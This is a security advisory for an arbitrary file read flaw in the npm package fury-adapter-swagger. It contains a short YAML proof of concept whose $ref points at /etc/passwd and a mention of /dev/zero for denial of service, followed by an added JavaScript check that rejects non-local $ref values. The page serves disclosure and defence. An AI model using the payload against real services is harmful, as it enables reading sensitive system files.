High severity · GHSA Advisory · Published Sep 1, 2020 · Updated Sep 11, 2023
fury-adapter-swagger allows arbitrary file read from system
CVE-2016-1000249
Description
fury-adapter-swagger from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files from the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like /dev/zero.
Proof of Concept:

```yaml
---
swagger: '2.0'
info:
  title: Read local files
  version: '1.0'
paths:
  /foo:
    get:
      responses:
        200:
          description: Some description
          examples:
            text/html:
              example:
                $ref: '/etc/passwd'
```
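The proof of concept works because the example `$ref` is handed to a resolver that will happily follow a filesystem path. A defensive pre-check is to refuse any `$ref` that is not an in-document JSON-pointer fragment before resolution starts. The following is an added example written for this page; it is not code from fury-adapter-swagger or from the fix referenced below, and the function names (`classifyRef`, `findExternalRefs`, `assertOnlyLocalRefs`) and the sample documents are constructed for illustration.

```javascript
// Added example, not code from fury-adapter-swagger. Walks a parsed Swagger 2.0
// document and reports every `$ref` that is not a local JSON-pointer fragment.
// The advisory's proof of concept points `$ref` at '/etc/passwd'; a loader that
// follows only in-document references ("#/definitions/Pet") never touches the
// filesystem or the network while resolving examples.

// Classify one $ref value. Only "#..." fragments count as local.
// Anything with a URI scheme (file:, http:, ...) is 'remote-url'; everything
// else ('/etc/passwd', '../other.yaml', '/dev/zero') is a bare 'path'.
function classifyRef(ref) {
  if (typeof ref !== 'string') return 'invalid';
  if (ref.startsWith('#')) return 'local';
  if (/^[a-z][a-z0-9+.-]*:/i.test(ref)) return 'remote-url';
  return 'path';
}

// Recursively collect every non-local $ref together with the JSON pointer of
// the key where it occurs, so a rejection message can name the exact location.
function findExternalRefs(node, pointer = '', out = []) {
  if (Array.isArray(node)) {
    node.forEach((item, i) => findExternalRefs(item, `${pointer}/${i}`, out));
  } else if (node && typeof node === 'object') {
    for (const [key, value] of Object.entries(node)) {
      // RFC 6901 escaping for "~" and "/" inside keys such as "/foo" or "text/html".
      const escaped = key.replace(/~/g, '~0').replace(/\//g, '~1');
      if (key === '$ref') {
        const kind = classifyRef(value);
        if (kind !== 'local') out.push({ pointer: `${pointer}/${escaped}`, ref: value, kind });
      } else {
        findExternalRefs(value, `${pointer}/${escaped}`, out);
      }
    }
  }
  return out;
}

// Gate to run before handing the document to a reference resolver:
// returns the document unchanged if every $ref is local, throws otherwise.
function assertOnlyLocalRefs(doc) {
  const bad = findExternalRefs(doc);
  if (bad.length > 0) {
    const list = bad
      .map((b) => `${b.pointer} -> ${JSON.stringify(b.ref)} (${b.kind})`)
      .join('; ');
    throw new Error(`Refusing to resolve non-local $ref: ${list}`);
  }
  return doc;
}

// Constructed sample: the advisory's proof of concept as a parsed object.
const poc = {
  swagger: '2.0',
  info: { title: 'Read local files', version: '1.0' },
  paths: {
    '/foo': {
      get: {
        responses: {
          200: {
            description: 'Some description',
            examples: { 'text/html': { example: { $ref: '/etc/passwd' } } },
          },
        },
      },
    },
  },
};

// Constructed sample: the same shape using an in-document reference, which is allowed.
const safeDoc = {
  swagger: '2.0',
  definitions: { Greeting: { type: 'string' } },
  paths: {
    '/foo': { get: { responses: { 200: { schema: { $ref: '#/definitions/Greeting' } } } } },
  },
};

// Stand-alone demonstration.
console.log(findExternalRefs(poc));          // one hit at .../example/$ref, kind 'path'
console.log(findExternalRefs(safeDoc).length); // 0
```

The check deliberately runs on the parsed object rather than on the resolver's output: by the time a resolver has reported an error, the file read (or the blocking read of `/dev/zero`) has already happened. Documents that legitimately need cross-file references should go through an explicit allow-list of base directories or URLs instead of the blanket rejection shown here.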
Recommendation
Upgrade to version 0.9.7 or later.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| fury-adapter-swagger (npm) | >= 0.2.0, < 0.9.7 | 0.9.7 |
References
- https://github.com/advisories/GHSA-2r7f-4h2c-5x73 (GHSA advisory)
- https://github.com/apiaryio/fury-adapter-swagger/commit/777e2d68f03546a88f3203bbd4725df8b1f662a7
- https://github.com/apiaryio/fury-adapter-swagger/commit/f4407e3a5323bc31123d45dbc93b8417002e4d51
- https://github.com/apiaryio/fury-adapter-swagger/pull/89
- https://security.snyk.io/vuln/npm:fury-adapter-swagger:20161024
- https://www.npmjs.com/advisories/305